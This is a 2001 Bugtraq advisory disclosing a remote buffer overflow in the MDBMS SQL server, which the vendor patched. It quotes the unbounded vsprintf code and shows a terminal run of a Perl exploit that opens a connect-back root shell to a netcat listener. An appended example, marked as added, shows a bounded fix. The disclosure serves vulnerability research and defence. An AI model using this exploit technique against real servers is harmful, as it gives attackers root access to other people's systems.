Bugtraq mailing list archives
Remote buffer overflow in MDBMS.
From: teleh0r - <teleh0r () digit-labs org>
Date: Tue, 12 Jun 2001 21:47:37 +0200
Dear bugtraq readers,

MDBMS is a SQL database server (currently) for UNIX systems. Version 0.99b9 and below contain an exploitable buffer overflow in the handling of the \s console command. When a user passes large buffers to the server in the form of multiple lines, these are appended to the end of each other. A subsequent call to the \s command causes the overflow.

Below is the faulty code (from interface.cc):

    void user::uprintf(char *s, ...)
    {
        char b[10000];
        int len=strlen(outbuf), newlen;
        va_list ap;

        va_start(ap,s);
        vsprintf(b,s,ap);        /* <---- unbounded write into b[10000] */
        va_end(ap);
        newlen=strlen(b);
        while (newlen+len+10>=outsize)
            outbuf=(char*)realloc(outbuf,outsize+=1000);
        strcat(outbuf,b);
        FD_SET(fd,&parent->wmask);
    }

mu-b also found a buffer overflow in the "create database" system. This was actually caused by a sprintf that generated the name of the management variable. This has been fixed - now table and database names can no longer be larger than 128 bytes.

Information about the overflows was sent to marty () hinttech com. He has now fixed the problems, and new versions of MDBMS can be found at:

http://www.hinttech.com/mdbms/

We would like to thank Marty for his kind response and quick update.

Exploit example:
----------------

[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
-- Remote code execution exploit - MDBMS <= 0.99b --
-- <teleh0r () digit-labs org> - Copyright (c) 2001

Usage: ./mdbms-pms.pl -t <hostname> -b <back>
  -t <hostname> : hostname to test
  -b <back>     : connect back to ip
  -p <port>     : port (default: 2223)
  -d <delay>    : delay before timeout
  -o <offset>   : offset
  -h            : return to heap

[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
-- Remote code execution exploit - MDBMS <= 0.99b --
-- <teleh0r () digit-labs org> - Copyright (c) 2001

-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return : 0x80cfe76 / using the heap ...
-> Sending payload: ...
-> * Successfully sent payload - good luck!
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...

Exploit code attached.

Sincerely yours,
teleh0r and mu-b

--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
Attachment:
mdbms.tar.gz
Description:
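The pattern behind the \s overflow, as an added example that is not part of the original post and not MDBMS code: the original uprintf formats an unbounded "%s" (the accumulated multi-line input) into a fixed 10000-byte stack buffer with vsprintf. The block below performs that size computation and reports whether the write would overrun, then shows the bounded alternative, which measures with vsnprintf(NULL, 0, ...) (C99), grows the output buffer to fit, and formats straight into it. struct user, formatted_len, uprintf_would_overflow, user_uprintf, build_multiline_input and the 1000-byte initial allocation are hypothetical names and values chosen for this example; the input is constructed inline.

```c
/*
 * Added example, not MDBMS code: the unbounded vsprintf() pattern from
 * interface.cc beside a bounded rewrite.  struct user, formatted_len,
 * uprintf_would_overflow, user_uprintf and build_multiline_input are
 * hypothetical names chosen for this example.
 */
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define UPRINTF_STACK_BUF 10000   /* size of "char b[10000]" in the original uprintf */

/* Stand-in for the per-connection object the original outbuf/outsize live on. */
struct user {
    char  *outbuf;   /* NUL-terminated output queued for the client, or NULL */
    size_t outsize;  /* bytes allocated for outbuf */
};

/* Length the formatted text would have; nothing is written (C99 vsnprintf). */
static int formatted_len(const char *fmt, va_list ap) {
    va_list cp;
    va_copy(cp, ap);
    int n = vsnprintf(NULL, 0, fmt, cp);
    va_end(cp);
    return n;
}

/*
 * The original does "char b[10000]; vsprintf(b, s, ap);" with no bound.  When
 * the "%s" argument is the multi-line input that \s echoes back, the result can
 * exceed 10000 bytes and vsprintf writes past b[] on the stack.  This performs
 * the same size computation and reports whether that write would overrun,
 * instead of performing it.
 */
int uprintf_would_overflow(const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    int n = formatted_len(fmt, ap);
    va_end(ap);
    return n < 0 || (size_t)n + 1 > UPRINTF_STACK_BUF;   /* +1 for the NUL */
}

/*
 * Bounded replacement: measure, grow outbuf to fit, then format straight into
 * outbuf with vsnprintf.  There is no fixed intermediate buffer, so no amount
 * of client input can overrun anything.  Returns bytes appended, or -1.
 */
int user_uprintf(struct user *u, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    int need = formatted_len(fmt, ap);
    if (need < 0) { va_end(ap); return -1; }

    size_t len = u->outbuf ? strlen(u->outbuf) : 0;
    size_t required = len + (size_t)need + 1;
    if (required > u->outsize) {
        size_t newsize = u->outsize ? u->outsize : 1000;
        while (newsize < required) newsize *= 2;   /* geometric growth, not +1000 per loop */
        char *p = realloc(u->outbuf, newsize);
        if (!p) { va_end(ap); return -1; }
        if (!u->outbuf) p[0] = '\0';               /* fresh allocation starts empty */
        u->outbuf = p;
        u->outsize = newsize;
    }
    vsnprintf(u->outbuf + len, u->outsize - len, fmt, ap);   /* bounded by construction */
    va_end(ap);
    return need;
}

/*
 * Constructed input: `lines` lines of `width` 'A's, each newline-terminated,
 * as a client would send them before issuing \s.  Caller frees the result.
 */
char *build_multiline_input(size_t lines, size_t width) {
    size_t total = lines * (width + 1);
    char *s = malloc(total + 1);
    if (!s) return NULL;
    for (size_t i = 0; i < lines; i++) {
        memset(s + i * (width + 1), 'A', width);
        s[i * (width + 1) + width] = '\n';
    }
    s[total] = '\0';
    return s;
}

int main(void) {
    char *big = build_multiline_input(20, 1000);   /* 20020 bytes, twice the stack buffer */
    struct user u = { NULL, 0 };
    printf("original uprintf would overflow b[%d]: %s\n", UPRINTF_STACK_BUF,
           uprintf_would_overflow("%s\n", big) ? "yes" : "no");
    int queued = user_uprintf(&u, "%s\n", big);
    printf("bounded uprintf queued %d bytes into a %zu-byte outbuf\n", queued, u.outsize);
    free(u.outbuf);
    free(big);
    return 0;
}
```

The same measure-then-write discipline covers the second bug in the post: the "create database" sprintf that built a management variable name was fixed by capping names at 128 bytes, which bounds the input; formatting into a buffer sized from vsnprintf's return value bounds the write regardless of what the input length limit is.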
Current thread:
- Remote buffer overflow in MDBMS. teleh0r - (Jun 13)